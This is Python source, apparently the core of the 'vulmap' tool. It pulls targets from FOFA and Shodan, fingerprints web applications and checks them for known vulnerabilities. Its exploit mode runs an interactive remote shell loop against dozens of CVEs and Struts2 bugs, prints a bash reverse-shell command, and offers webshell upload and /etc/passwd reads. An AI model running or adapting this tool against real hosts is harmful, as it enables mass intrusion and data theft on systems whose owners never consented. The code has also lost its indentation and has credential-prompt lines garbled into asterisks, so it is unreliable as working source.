def scan_print(vul_info):
try:
delay = globals.get_value("DELAY") # 获取全局变量DELAY
debug = globals.get_value("DEBUG") # 获取全局变量DEBUG
result = vul_info["prt_resu"]
prt_name = vul_info["prt_name"]
vul_name = vul_info["vul_name"]
vul_type = vul_info["vul_type"]
vul_numb = vul_info["vul_numb"]
info = vul_info["prt_info"]
if result == "PoCSuCCeSS": # 存在漏洞时候输出以下内容
print(now.timed(de=delay) + color.green("[+] The target is " + prt_name + " " + info))
# 丢给output模块判断是否输出文件
output("json", vul_info)
output("text", "--> [名称:" + vul_name + "] [编号:" + vul_numb + "] [类型:" + vul_type + "] " + info)
elif result == "PoC_MaYbE":
print(now.timed(de=delay) + color.green("[?] The target maybe " + prt_name + " " + info))
# 丢给output模块判断是否输出文件
output("json", vul_info)
output("text", "--> [名称:" + vul_name + "] [编号:" + vul_numb + "] [类型:" + vul_type + "] " + info)
else: # 否则就是没有洞
if debug == "debug":
print(now.timed(de=delay) + color.magenta("[-] The target no " + color.magenta(prt_name)))
else:
print("\r{0}{1}{2}".format(now.timed(de=delay),
color.magenta("[-] The target no "),
color.magenta(prt_name)), end=" \r", flush=True)
except IndexError as error:
print(now.timed(de=0) + color.red("[ERROR] " + error.__traceback__.tb_frame.f_globals['__file__']
+ " " + str(error.__traceback__.tb_lineno)))
def fofa(fofa, size):
timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
email = globals.get_value("fofa_email")
key = globals.get_value("fofa_key")
fofa_target = []
keyword = base64.b64encode(str.encode(fofa))
qbase = keyword.decode('ascii')
api_url = "https://fofa.so/api/v1/search/all?email={email}&key={key}&size={size}&qbase64={qbase}".format(email=email, key=key, size=size, qbase=qbase)
print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa api: " + api_url))
try:
res = requests.get(api_url, headers=headers, timeout=timeout, verify=False)
if res.status_code != 200:
print(now.timed(de=0) + color.red_warn() + color.red(" " + res.text))
exit(0)
r = json.loads(res.text)
for i in r['results']:
fofa_target.append(i[0])
return fofa_target
except requests.exceptions.Timeout:
print(now.timed(de=0) + color.red_warn() + color.red(" Fofa API connection failed because of timeout "))
exit(0)
except requests.exceptions.ConnectionError:
print(now.timed(de=0) + color.red_warn() + color.red(" Fofa API connection failed because the connection failed "))
exit(0)
except Exception as e:
print(now.timed(de=0) + color.red_warn() + color.red(" Fofa API connection failed because unknown error "))
exit(0)
def start(url, webapps_identify):
ua = globals.get_value("UA") # 获取全局变量UA
timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
headers = {'User-Agent': ua}
try:
resp = requests.get(url, headers=headers, timeout=timeout, verify=False)
except:
resp = "null"
start = Identify(url)
start.flink(webapps_identify, resp, url)
start.tomcat(webapps_identify, resp, url)
start.fastjson(webapps_identify, url)
start.elasticsearch(webapps_identify, resp, url)
start.jenkins(webapps_identify, resp, url)
start.weblogic(webapps_identify, resp, url)
start.spring(webapps_identify, resp, url)
start.solr(webapps_identify, resp, url)
start.nexus(webapps_identify, resp, url)
start.jboss(webapps_identify, resp, url)
start.drupal(webapps_identify, resp, url)
start.struts2(webapps_identify, resp, url)
start.shiro(webapps_identify, resp, url)
start.druid(webapps_identify, resp, url)
start.eyou(webapps_identify, resp, url)
start.coremail(webapps_identify, resp, url)
if webapps_identify:
for a in webapps_identify:
print("\r{0}{1}".format(now.timed(de=0) + color.yel_info(), color.yellow(" The identification target is: " + a + " ")))
else:
webapps_identify.append("all")
print("\r{0}{1}".format(now.timed(de=0) + color.yel_info(), color.yellow(" Unable to identify target, Run all pocs ")))
def version_check():
version = globals.get_value("VULMAP") # 获取全局变量VULMAP版本号
timeout = globals.get_value("TIMEOUT") # 获取全局变量TIMEOUT
headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
github_ver_url = "https://github.com/zhzyker/vulmap/blob/main/version"
now_warn = now.timed(de=0) + color.red_warn()
try:
github_ver_request = requests.get(url=github_ver_url,
headers=headers,
timeout=timeout)
version_res = r'blob-code blob-code-inner js-file-line">(.*)</td>'
github_ver = re.findall(version_res, github_ver_request.text,
re.S | re.M)[0]
if version == github_ver:
print(
now.timed(de=0) + color.yel_info() +
color.yellow(" Currently the latest version: " + version))
elif version < github_ver:
print(now_warn + color.red(" The current version is: " + version +
", Latest version: " + github_ver))
print(now_warn + color.red(
" Go to github https://github.com/zhzyker/vulmap update"))
else:
print(now_warn + color.red(" Unknown version: " + version))
except requests.exceptions.ConnectionError:
print(now_warn + color.red(" The current version is: " + version +
", Version check filed"))
except requests.exceptions.Timeout:
print(now_warn + color.red(" The current version is: " + version +
", Version check filed"))
def proxy_set(pr, pr_mode):
headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
try:
proxy_ip = str(re.search(r"(.*):", pr).group(1))
proxy_port = int(re.search(r":(.*)", pr).group(1))
except AttributeError:
print(
now.timed(de=0) + color.red_warn() + color.red(
" Proxy format error (e.g. --proxy-socks 127.0.0.1:1080)"))
sys.exit(0)
if r"socks" in pr_mode:
socks.set_default_proxy(socks.SOCKS5, proxy_ip, proxy_port)
elif r"http" in pr_mode:
socks.set_default_proxy(socks.HTTP, addr=proxy_ip, port=proxy_port)
socket.socket = socks.socksocket
try:
proxy_ip_info = requests.get("http://api.hostip.info/get_json.php",
headers=headers,
timeout=5)
proxy_ip_info_json = json.loads(proxy_ip_info.text)
proxy_ip_info_dict = "[region: " + proxy_ip_info_json[
"country_name"] + "] " + "[city: " + proxy_ip_info_json[
"city"] + "] " + "[proxy ip: " + proxy_ip_info_json["ip"] + "]"
except requests.exceptions.ConnectionError:
proxy_ip_info_dict = "[region: ???] [city: ???] [proxy ip: ???]"
except requests.exceptions.Timeout:
proxy_ip_info_dict = "[region: ???] [city: ???] [proxy ip: ???]"
print(
now.timed(de=0) + color.yel_info() +
color.yellow(" Use custom proxy: " + pr))
print(
now.timed(de=0) + color.yel_info() +
color.yellow(" Proxy info: " + proxy_ip_info_dict))
def error_print(prt_name):
delay = globals.get_value("DELAY") # 获取全局变量DELAY
debug = globals.get_value("DEBUG") # 获取全局变量DEBUG
if debug == "debug":
print(now.timed(de=delay) + color.magenta("[-] The target no " + color.magenta(prt_name)))
else:
print("\r{0}{1}{2}".format(now.timed(de=delay),
color.magenta("[-] The target no "),
color.magenta(prt_name)),
end=" \r",
flush=True)
def connection_print(prt_name):
delay = globals.get_value("DELAY") # 获取全局变量DELAY
debug = globals.get_value("DEBUG") # 获取全局变量DEBUG
if debug == "debug":
print(now.timed(de=delay) + color.red_warn() +
color.cyan(" " + prt_name + " check failed because unable to connect !!!"))
else:
print("\r{0}{1}{2}".format(now.timed(de=delay),
color.red_warn(),
color.cyan(" " + prt_name + " connection failed !!!")),
end=" \r",
flush=True)
def exploit_print(request, raw_data):
delay = globals.get_value("DELAY") # 获取全局变量DELAY
debug = globals.get_value("DEBUG") # 获取全局变量DEBUG
if debug == "debug":
print(raw_data)
elif r"PoC_WaTinG" in request:
print(now.timed(de=delay) + color.red_warn() + color.magenta(" Command Executed Failed... ..."))
else:
print(request)
def shodan_api(shodan_keyword):
try:
shodan_key = globals.get_value("shodan_key")
api = shodan.Shodan(shodan_key)
res = api.search(shodan_keyword)
shodan_target = []
for result in res['matches']:
shodan_target.append("%s:%s" % (result['ip_str'], result['port']))
return shodan_target
except shodan_key.APIError as e:
print(now.timed(de=0) + color.red_warn() + color.red(" Shodan api: " + str(e)))
exit(0)
def install_crypto():
input_crypto = input(
now.timed(de=0) + color.yel_info() + color.yellow(
" pycryptodome dependency not found, install it now (y/n): "))
if input_crypto == "y":
try:
pwd_packages = sysconfig.get_paths()["purelib"]
os.chdir(pwd_vulmap)
pycryptodome_tar = "./thirdparty/pycryptodome.tar.gz"
t = tarfile.open(pycryptodome_tar)
t.extractall(path=pwd_packages)
pwd_crypto = pwd_packages + "/pycryptodome"
os.chdir(pwd_crypto)
try:
if os.system(
"python3 setup.py install >> /dev/null 2>&1") == 0:
print(
now.timed(de=0) + color.yel_info() +
color.yellow(" pycryptodome install to: " +
pwd_packages))
print(
now.timed(de=0) + color.yel_info() + color.yellow(
" Crypto dependency installation is complete"))
#print(now.timed(de=0) + color.red_warn() + color.yellow(
# " Permission denied, need root permissions to install"))
#if os.system("sudo python3 setup.py install") == 0:
# print(now.timed(de=0) + color.yel_info() + color.yellow(" pycryptodome install to: " + pwd_packages))
# print(now.timed(de=0) + color.yel_info() + color.yellow(
# " pycryptodome dependency installation is complete"))
except:
print(
now.timed(de=0) + color.red_warn() + color.yellow(
" Crypto installation failed, please use \" pip3 install pycryptodome\" to install"
))
except Exception as error:
if r"Permission" in str(error):
print(
now.timed(de=0) + color.red_warn() + color.yellow(
" Permission denied: Need root privileges or \"sudo xxxx\""
))
def ceye():
timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
ceye_domain = globals.get_value("ceye_domain")
ceye_token = globals.get_value("ceye_token")
ceye_token = globals.get_value("ceye_token")
api_url = "http://api.ceye.io/v1/records?type=dns&token=" + ceye_token
res = requests.get(api_url, headers=headers, timeout=timeout, verify=False)
if res.status_code != 200:
print(
now.timed(de=0) + color.red_warn() +
color.red(" Ceye.io: " + res.text))
return res.text
def output(types, item):
try:
o_text = globals.get_value("O_TEXT")
o_json = globals.get_value("O_JSON")
if o_text and types == "text":
output_text(o_text, item)
elif o_json and types == "json":
output_json(o_json, item)
else:
pass
except Exception as error:
print(
now.timed(de=0) +
color.red("[ERROR] " +
error.__traceback__.tb_frame.f_globals['__file__'] +
" " + str(error.__traceback__.tb_lineno)))
def dismap(line):
if "dismap" in line:
print(
now.timed(de=0) + color.yel_info() +
color.green(" The file is dismap Identification results"))
globals.set_value("DISMAP", "true")
return "######"
elif "######" in line:
return "######"
if globals.get_value("DISMAP") == "true":
try:
search = re.findall("[{] (.*?) [}]", line)
return search[0]
except:
return
else:
return line
def control_options(args): # 选项控制,用于处理所有选项
delay = globals.get_value("DELAY") # 获取全局变量延时时间DELAY
now_warn = now.timed(de=delay) + color.red_warn()
if args.socks:
proxy_set(args.socks, "socks") # proxy support socks5 http https
elif args.http:
proxy_set(args.http, "http") # proxy support socks5 http https
if args.list is False: # 判断是否显示漏洞列表
print(now.timed(de=0) + color.yel_info() + color.yellow(" List of supported vulnerabilities"))
print(vul_list())
if args.thread_num != 10: # 判断是否为默认线程
print(now.timed(de=0) + color.yel_info() + color.yellow(" Custom thread number: " + str(args.thread_num)))
if args.vul is not None: # 判断是否-v进行漏洞利用
args.mode = "exp" # 若进行漏洞利用修改模式为exp
if args.debug is False: # 判断是否开启--debug功能
print(now.timed(de=delay) + color.yel_info() + color.yellow(" Using debug mode to echo debug information"))
globals.set_value("DEBUG", "debug") # 设置全局变量DEBUG
#ceye_api() # 测试ceye连接性
if dns_request(): # 初始化dnslog, 并判断是否可用
pass
else:
print(now_warn + color.red(" Dnslog platform (hyuga.co dnslog.cn ceye.io) is not available"))
if args.O_TEXT: # 判断是否text输出
if os.path.isfile(args.O_TEXT): # 判断text输出文件是否冲突
print(now.timed(de=delay) + color.red_warn() + color.red(" The json file: [" + args.O_TEXT + "] already exists"))
exit(0)
if args.O_JSON: # 判断是否json输出
if os.path.isfile(args.O_JSON): # 判断json输出文件是否冲突
print(now.timed(de=delay) + color.red_warn() + color.red(" The json file: [" + args.O_JSON + "] already exists"))
exit(0)
if args.mode is None or args.mode == "poc": # 判断是否进入poc模式
if args.url is not None and args.file is None: # 判断是否为仅-u扫描单个URL
args.url = url_check(args.url) # 处理url格式
if survival_check(args.url) == "f": # 检查目标存活状态
print(now.timed(de=0) + color.red_warn() + color.red(" Survival check failed: " + args.url))
exit(0) # 单个url时存活失败就退出
print(now.timed(de=0) + color.yel_info() + color.cyan(" Start scanning target: " + args.url))
if args.app is None: # 判断是否扫描扫描全部webapps
globals.set_value("RUNALLPOC", True) # 扫描单个URL并且所有webapps时RUNALLPOC=True
core.control_webapps("url", args.url, args.app, "poc")
else: # 否则扫描单个webapps
core.control_webapps("url", args.url, args.app, "poc")
elif args.file is not None and args.url is None: # 判断是否为仅-f批量扫描文件
if os.path.isfile(args.file): # 判断批量目标文件是否存在
print(now.timed(de=0) + color.yel_info() + color.cyan(" Start batch scanning target: " + args.file))
else: # 没有文件错误并退出
print(now.timed(de=0) + color.red_warn() + color.red(" Not found target file: " + args.file))
exit(0)
if args.app is None: # 判断是否扫描扫描全部webapps
globals.set_value("RUNALLPOC", "FILE") # 批量扫描URL并且所有webapps时RUNALLPOC="FILE"
core.control_webapps("file", args.file, args.app, "poc")
else: # 否则批量扫描单个webapps
core.control_webapps("file", args.file, args.app, "poc")
elif args.url is None and args.file is None and args.fofa is not None: # 调用fofa api
print(now.timed(de=0) + color.yel_info() + color.yellow(" Use fofa api to search [" + args.fofa + "] and start scanning"))
if r"xxxxxx" in globals.get_value("fofa_key"): # 使用fofa api之前判断fofa信息是否正确
print(now.timed(de=0) + color.red_warn() + color.red(" Check fofa email is xxxxxx Please replace key and email"))
print(now.timed(de=0) + color.red_warn() + color.red(" Go to https://fofa.so/user/users/info find key and email"))
print(now.timed(de=0) + color.red_warn() + color.red(" How to use key and email reference https://github.com/zhzyker/vulmap"))
exit(0)
else:
print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa email: " + globals.get_value("fofa_email")))
print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa key: " + globals.get_value("fofa_key")))
fofa_list = fofa(args.fofa, args.size) # 调用fofa api拿到目标数组默认100个
if args.app is None: # 判断是否扫描扫描全部webapps
core.control_webapps("fofa", fofa_list, args.app, "poc")
else:
core.control_webapps("fofa", fofa_list, args.app, "poc")
elif args.url is None and args.file is None and args.shodan is not None: # 调用fofa api 或者 shodan api
print(now.timed(de=0) + color.yel_info() + color.yellow(" Use shodan api to search [" + args.shodan + "] and start scanning"))
if r"xxxxxx" in globals.get_value("shodan_key"): # 使用shodan api之前判断shodan信息是否正确
print(now.timed(de=0) + color.red_warn() + color.red(" Check shodan key is xxxxxx Please replace key"))
print(now.timed(de=0) + color.red_warn() + color.red(" Go to https://account.shodan.io/ find key"))
print(now.timed(de=0) + color.red_warn() + color.red(" How to use key reference https://github.com/zhzyker/vulmap"))
exit(0)
else:
print(now.timed(de=0) + color.yel_info() + color.yellow(" Shodan key: " + globals.get_value("shodan_key")))
shodan_list = shodan_api(args.shodan) # 调用shodan api拿到目标数组默认100个
if args.app is None: # 判断是否扫描扫描全部webapps
core.control_webapps("shodan", shodan_list, args.app, "poc")
else:
core.control_webapps("shodan", shodan_list, args.app, "poc")
if args.O_TEXT:
print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result text saved to: " + args.O_TEXT))
if args.O_JSON:
print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result json saved to: " + args.O_JSON))
elif args.mode == "exp": # 漏洞利用模式参数较少
if args.vul is not None and args.url is not None: # 判断是否进入漏洞利用模式
core.control_webapps("url", args.url, args.vul, "exp")
else:
print(now_warn + color.red(" Options error, -v must specify -u"))
else:
print(now_warn + color.red(" Options error ... ..."))
def control_webapps(target_type, target, webapps, mode):
t_num = globals.get_value("THREADNUM") # 线程数量
thread_poc = [] # 多线程字典,用于添加线程任务
gevent_pool = [] # 协程字段,用于添加协程任务
thread_pool = ThreadPoolExecutor(t_num) # 多线程池数量t_num由选项控制,默认10线程
webapps_identify = [] # 定义目标类型字典,用于目标类型识别并记录,为跑所有poc时进行类型识别
if mode == "poc": # poc漏洞扫描模式
if target_type == "url": # ========================================================= 第一种扫描仅扫描单个URL
output("text", "[*] " + target) # 丢给output模块判断是否输出文件
if webapps is None: # 判断是否进行指纹识别
Identify.start(target, webapps_identify) # 第一种情况需要进行指纹识别
elif r"all" in webapps: # 判断是否扫描所有类型poc
print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify to scan all vulnerabilities"))
webapps_identify.append("all") # 指定扫描所有时,需要将指纹全部指定为all
else:
webapps_identify = webapps # 指定但不是all,也可以指定多个类型,比如-a solr struts2
print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify scan vulnerabilities for: "), end='')
count = 0 # 用于判断类型的数量,一个还是多个
for w_i in webapps_identify:
print(color.cyan(w_i), end=' ')
count += 1
if count % len(webapps_identify) == 0:
print(end='\n')
core.scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, target) # 调用scan开始扫描
joinall(gevent_pool) # 运行协程池
wait(thread_poc, return_when=ALL_COMPLETED) # 等待所有多线程任务运行完
print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended "))
elif target_type == "file": # ========================= 第二种扫描情况,批量扫描文件不指定webapps时需要做指纹识别
count_line = -1 # 用于判断行数
count_null = 0
for line in open(target).readlines(): # 判断文件里有多少空行
line = line.strip() # 读取目标时过滤杂质
if line == "":
count_null += 1
for count_line, line in enumerate(open(target, 'rU')): # 判断文件的行数
pass
count_line += 1 # 行数加1
target_num = count_line - count_null
now_num = 0 # 当前数量
target_list = [] # 批量扫描需要读取的字典
with open(target, 'r') as _: # 打开目标文件
for line in _: # 用for循环读取文件
line = line.strip() # 过滤杂质
if line: # 判断是否结束
target_list.append(line) # 读取到的目标加入字典准备扫描
now_num += 1 # 读取到之后当前数量+1
furl = line
furl = url_check(furl) # url格式检测
output("text", "[*] " + furl) # 丢给output模块判断是否输出文件
if survival_check(furl) == "f": # 如果存活检测失败就跳过
print(now.timed(de=0) + color.red_warn() + color.red(
" Current:[" + str(now_num) + "] Total:[" + str(
target_num) + "] Survival check failed: " + furl))
continue
else: # 存活不失败就正常显示
print(now.timed(de=0) + color.yel_info() + color.yellow(
" Current:[" + str(now_num) + "] Total:[" + str(
target_num) + "] Scanning target: " + furl))
if webapps is None: # 判断是否要进行指纹识别
webapps_identify.clear() # 可能跟单个url冲突需要清理字典
Identify.start(furl, webapps_identify) # 识别指纹
# print(webapps_identify)
elif r"all" in webapps: # 不识别指纹运行所有
print(now.timed(de=0) + color.yel_info() + color.yellow(
" Specify to scan all vulnerabilities"))
webapps_identify.append("all")
else:
webapps_identify = webapps
print(now.timed(de=0) + color.yel_info() + color.yellow(
" Specify scan vulnerabilities for: "),
end='')
count = 0
for w_i in webapps_identify:
print(color.cyan(w_i), end=' ')
count += 1
if count % len(webapps_identify) == 0:
print(end='\n')
core.scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, furl) # 开扫
joinall(gevent_pool) # 运行协程池
wait(thread_poc, return_when=ALL_COMPLETED) # 等待所有多线程任务运行完
print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended "))
elif target_type == "fofa" or target_type == "shodan": # ======================================================= 第三种调用fofa api
total = len(target) # fofa api的总数,不出意外100个
if webapps is not None:
if r"all" in webapps: # 不识别直接扫描所有类型
print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify to scan all vulnerabilities"))
webapps_identify.append("all")
else:
webapps_identify = webapps # 扫描指定的类型
print(now.timed(de=0) + color.yel_info() + color.yellow(" Specify scan vulnerabilities for: "), end='')
count = 0
for w_i in webapps_identify:
print(color.cyan(w_i), end=' ')
count += 1
if count % len(webapps_identify) == 0:
print(end='\n')
now_num = 0 # 当前第几个
for f_target in target:
fofa_target = url_check(f_target)
output("text", "[*] " + fofa_target) # 丢给output模块判断是否输出文件
now_num += 1
if survival_check(fofa_target) == "f":
print(now.timed(de=0) + color.red_warn() + color.red(
" Current:[" + str(now_num) + "] Total:[" + str(
total) + "] Survival check failed: " + fofa_target))
continue
else:
print(now.timed(de=0) + color.yel_info() + color.yellow(
" Current:[" + str(now_num) + "] Total:[" + str(
total) + "] Scanning target: " + fofa_target))
if webapps is None: # 需要指纹识别
Identify.start(target, webapps_identify) # 是否需要进行指纹识别
core.scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, fofa_target)
joinall(gevent_pool) # 运行协程池
wait(thread_poc, return_when=ALL_COMPLETED) # 等待所有多线程任务运行完
print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended "))
elif mode == "exp": # 漏洞利用
vul_num = webapps
exploit(target, vul_num) # 调用core中的exploit
def exploit(target, vul_num):
target = url_check(target)
if survival_check(target) == "f":
print(
now.timed(de=0) + color.red_warn() +
color.red(" Survival check failed: " + target))
exit(0)
delay = globals.get_value("DELAY") # 获取全局变量DELAY
exp_apache_shiro = ApacheShiro(target)
exp_apache_solr = ApacheSolr(target)
exp_apache_tomcat = ApacheTomcat(target)
exp_elasticsearch = Elasticsearch(target)
exp_apache_flink = ApacheFlink(target)
exp_jenkins = Jenkins(target)
exp_spring = Spring(target)
exp_nexus = Nexus(target)
exp_oracle_weblogic = OracleWeblogic(target)
exp_redhat_jboss = RedHatJBoss(target)
exp_apache_unomi = ApacheUnomi(target)
exp_thinkphp = ThinkPHP(target)
exp_drupal = Drupal(target)
exp_fastjson = Fastjson(target)
exp_apache_struts2 = ApacheStruts2(target)
print(
now.timed(de=delay) + color.yel_info() +
color.cyan(" Target url: " + target))
print(
now.timed(de=delay) + color.yel_info() +
color.cyan(" Use exploit modules: " + vul_num))
nc = now.timed(de=0) + color.yel_info() + color.yellow(
" input \"nc\" bounce linux shell")
up = now.timed(de=0) + color.yel_info() + color.yellow(
" input \"upload\" upload webshell")
rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow(
" RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)")
bash = now.timed(de=0) + color.yel_info() + color.yellow(
" nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"")
cmd = "whoami" # 为了消除pycharm错误提示,没啥用
file = "/etc/passwd" # 为了消除pycharm错误提示,没啥用
shiro_key = "1" # 为了消除pycharm错误提示,没啥用
shiro_gadget = "1" # 为了消除pycharm错误提示,没啥用
nexus_u = "admin" # 为了消除pycharm错误提示,没啥用
nexus_p = "admin" # 为了消除pycharm错误提示
if vul_num not in explists:
print(
now.timed(de=0) + color.red_warn() + color.red(
" The vulnerability does not support exploitation. Please refer to \"--list\""
))
sys.exit(0)
elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437":
if os_check() == "linux" or os_check() == "other":
shiro_key = input(now.timed(de=delay) + color.green("[+] key: "))
shiro_gadget = input(
now.timed(de=delay) + color.green("[+] gadget: "))
elif os_check() == "windows":
shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ")
shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ")
while True:
if os_check() == "linux" or os_check() == "other":
cmd = input(
now.timed(de=delay) + color.green("[+] Shell >>> "))
elif os_check() == "windows":
cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
if cmd == "exit" or cmd == "quit" or cmd == "bye":
sys.exit(0)
exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget)
elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938":
print(
now.timed(de=delay) + color.yel_info() +
color.yellow(" Examples: WEB-INF/web.xml"))
while True:
if os_check() == "linux" or os_check() == "other":
file = input(
now.timed(de=delay) + color.green("[+] File >>> "))
elif os_check() == "windows":
file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
if file == "exit" or file == "quit" or file == "bye":
exit(0)
exp_apache_tomcat.cve_2020_1938_exp(file)
elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799":
print(
now.timed(de=delay) + color.yel_info() +
color.yellow(" Examples: /etc/passwd"))
while True:
if os_check() == "linux" or os_check() == "other":
file = input(
now.timed(de=delay) + color.green("[+] File >>> "))
elif os_check() == "windows":
file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
if file == "exit" or file == "quit" or file == "bye":
exit(0)
exp_spring.cve_2019_3799_exp(file)
elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410":
print(
now.timed(de=delay) + color.yel_info() +
color.yellow(" Examples: /etc/passwd"))
while True:
if os_check() == "linux" or os_check() == "other":
file = input(
now.timed(de=delay) + color.green("[+] File >>> "))
elif os_check() == "windows":
file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
if file == "exit" or file == "quit" or file == "bye":
exit(0)
exp_spring.cve_2020_5410_exp(file)
elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519":
print(
now.timed(de=delay) + color.yel_info() +
color.yellow(" Examples: /etc/passwd"))
while True:
if os_check() == "linux" or os_check() == "other":
file = input(
now.timed(de=delay) + color.green("[+] File >>> "))
elif os_check() == "windows":
file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
if file == "exit" or file == "quit" or file == "bye":
exit(0)
exp_apache_flink.cve_2020_17519_exp(file)
elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199":
if os_check() == "linux" or os_check() == "other":
nexus_u = input(
now.timed(de=delay) + color.green("[+] Input username: "******"[+] Input password: "******"windows":
nexus_u = input(
now.no_color_timed(de=delay) + "[+] Input username: "******"[+] Input password: "******"linux" or os_check() == "other":
cmd = input(
now.timed(de=delay) + color.green("[+] Shell >>> "))
elif os_check() == "windows":
cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
if cmd == "exit" or cmd == "quit" or cmd == "bye":
sys.exit(0)
exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p)
# 远程命令执行漏洞单独简单运行
else:
while True:
if os_check() == "linux" or os_check() == "other":
cmd = input(
now.timed(de=delay) + color.green("[+] Shell >>> "))
elif os_check() == "windows":
cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
if cmd == "exit" or cmd == "quit" or cmd == "bye":
exit(0)
elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615":
exp_apache_tomcat.cve_2017_12615_exp(cmd)
elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120":
exp_elasticsearch.cve_2014_3120_exp(cmd)
elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427":
exp_elasticsearch.cve_2015_1427_exp(cmd)
elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861":
exp_jenkins.cve_2018_1000861_exp(cmd)
elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506":
exp_oracle_weblogic.cve_2017_3506_exp(cmd)
elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271":
print(nc)
print(up)
exp_oracle_weblogic.cve_2017_10271_exp(cmd)
elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894":
exp_oracle_weblogic.cve_2018_2894_exp(cmd)
elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725":
print(nc)
print(up)
exp_oracle_weblogic.cve_2019_2725_exp(cmd)
elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729":
print(nc)
exp_oracle_weblogic.cve_2019_2729_exp(cmd)
elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555":
exp_oracle_weblogic.cve_2020_2555_exp(cmd)
elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883":
exp_oracle_weblogic.cve_2020_2883_exp(cmd)
elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882":
exp_oracle_weblogic.cve_2020_14882_exp(cmd)
elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629":
exp_apache_solr.cve_2017_12629_exp(cmd)
elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558":
exp_apache_solr.cve_2019_17558_exp(cmd)
elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238":
exp_nexus.cve_2019_7238_exp(cmd)
elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738":
exp_redhat_jboss.cve_2010_0738_exp(cmd)
elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428":
exp_redhat_jboss.cve_2010_1428_exp(cmd)
elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501":
exp_redhat_jboss.cve_2015_7501_exp(cmd)
elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942":
exp_apache_unomi.cve_2020_13942_exp(cmd)
elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082":
print(up)
exp_thinkphp.cve_2019_9082_exp(cmd)
elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062":
exp_thinkphp.cve_2018_20062_exp(cmd)
elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600":
exp_drupal.cve_2018_7600_exp(cmd)
elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602":
exp_drupal.cve_2018_7602_exp(cmd)
elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340":
exp_drupal.cve_2019_6340_exp(cmd)
elif vul_num == "S2-005" or vul_num == "s2-005":
exp_apache_struts2.s2_005_exp(cmd)
elif vul_num == "S2-008" or vul_num == "s2-008":
exp_apache_struts2.s2_008_exp(cmd)
elif vul_num == "S2-009" or vul_num == "s2-009":
exp_apache_struts2.s2_009_exp(cmd)
elif vul_num == "S2-013" or vul_num == "s2-013":
exp_apache_struts2.s2_013_exp(cmd)
elif vul_num == "S2-015" or vul_num == "s2-015":
exp_apache_struts2.s2_015_exp(cmd)
elif vul_num == "S2-016" or vul_num == "s2-016":
exp_apache_struts2.s2_016_exp(cmd)
elif vul_num == "S2-029" or vul_num == "s2-029":
exp_apache_struts2.s2_029_exp(cmd)
elif vul_num == "S2-032" or vul_num == "s2-032":
exp_apache_struts2.s2_032_exp(cmd)
elif vul_num == "S2-045" or vul_num == "s2-045":
exp_apache_struts2.s2_045_exp(cmd)
elif vul_num == "S2-046" or vul_num == "s2-046":
exp_apache_struts2.s2_046_exp(cmd)
elif vul_num == "S2-048" or vul_num == "s2-048":
exp_apache_struts2.s2_048_exp(cmd)
elif vul_num == "S2-052" or vul_num == "s2-052":
exp_apache_struts2.s2_052_exp(cmd)
